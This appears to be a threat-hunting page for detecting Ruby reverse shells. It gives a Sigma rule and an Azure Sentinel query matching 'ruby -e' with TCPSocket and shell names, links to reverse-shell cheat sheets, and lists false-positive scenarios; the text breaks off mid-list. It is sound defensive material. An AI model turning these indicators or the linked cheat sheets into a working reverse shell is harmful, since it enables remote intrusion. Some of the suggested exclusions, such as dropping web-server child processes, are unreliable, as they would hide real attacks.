The hypothesis is that the detection of ruby execution with the backslash character may indicate an adversary attempting to establish a reverse shell to exfiltrate data or execute commands remotely. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify potential command and control activity early and prevent further compromise.
Detection Rule
title: Potential Ruby Reverse Shell
id: b8bdac18-c06e-4016-ac30-221553e74f59
status: test
description: Detects execution of ruby with the "-e" flag and calls to "socket" related functions. This could be an indication of a potential attempt to setup a reverse shell
references:
- https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
- https://www.revshells.com/
author: '@d4ns4n_'
date: 2023-04-07
tags:
- attack.execution
logsource:
category: process_creation
product: linux
detection:
selection:
Image|contains: 'ruby'
CommandLine|contains|all:
- ' -e'
- 'rsocket'
- 'TCPSocket'
CommandLine|contains:
- ' ash'
- ' bash'
- ' bsh'
- ' csh'
- ' ksh'
- ' pdksh'
- ' sh'
- ' tcsh'
condition: selection
falsepositives:
- Unknown
level: medium
imProcessCreate
| where TargetProcessName contains "ruby" and (TargetProcessCommandLine contains " -e" and TargetProcessCommandLine contains "rsocket" and TargetProcessCommandLine contains "TCPSocket") and (TargetProcessCommandLine contains " ash" or TargetProcessCommandLine contains " bash" or TargetProcessCommandLine contains " bsh" or TargetProcessCommandLine contains " csh" or TargetProcessCommandLine contains " ksh" or TargetProcessCommandLine contains " pdksh" or TargetProcessCommandLine contains " sh" or TargetProcessCommandLine contains " tcsh")Scenario: Scheduled Ruby Job Running Normally
Description: A legitimate cron job or systemd timer runs a Ruby script to perform routine maintenance, such as log rotation or data aggregation.
Filter/Exclusion: Exclude processes with command_line containing /usr/bin/ruby and paths to known system scripts (e.g., /etc/cron.d/, /var/spool/cron/, or /etc/systemd/system/).
Scenario: Ruby on Rails Application Handling User Input
Description: A web application (e.g., Rails app) receives user input that includes a Ruby command via a form or API, which is then executed in a safe sandboxed environment.
Filter/Exclusion: Exclude processes where the parent process is a web server (e.g., puma, nginx, unicorn) and filter by process.parent_id matching known web server PIDs.
Scenario: Admin Performing Ruby Script Debugging
Description: An admin uses a Ruby script (e.g., script/console, irb, or pry) to debug or test code in a development environment.
Filter/Exclusion: Exclude processes with command_line containing irb, pry, or script/console, and filter by user IDs of known admin accounts.
Scenario: Ruby Used for Automation (e.g., Ansible, Chef)
Description: A DevOps tool like Ansible or Chef runs Ruby-based playbooks or recipes to configure systems or deploy applications.
Filter/Exclusion: Exclude processes where the command line includes ansible-playbook, chef-client, or kitchen and filter by paths in known DevOps directories (e.g., /etc/ansible/, /var/chef/).
Scenario: Ruby Used for Data Processing (e.g., ETL Jobs)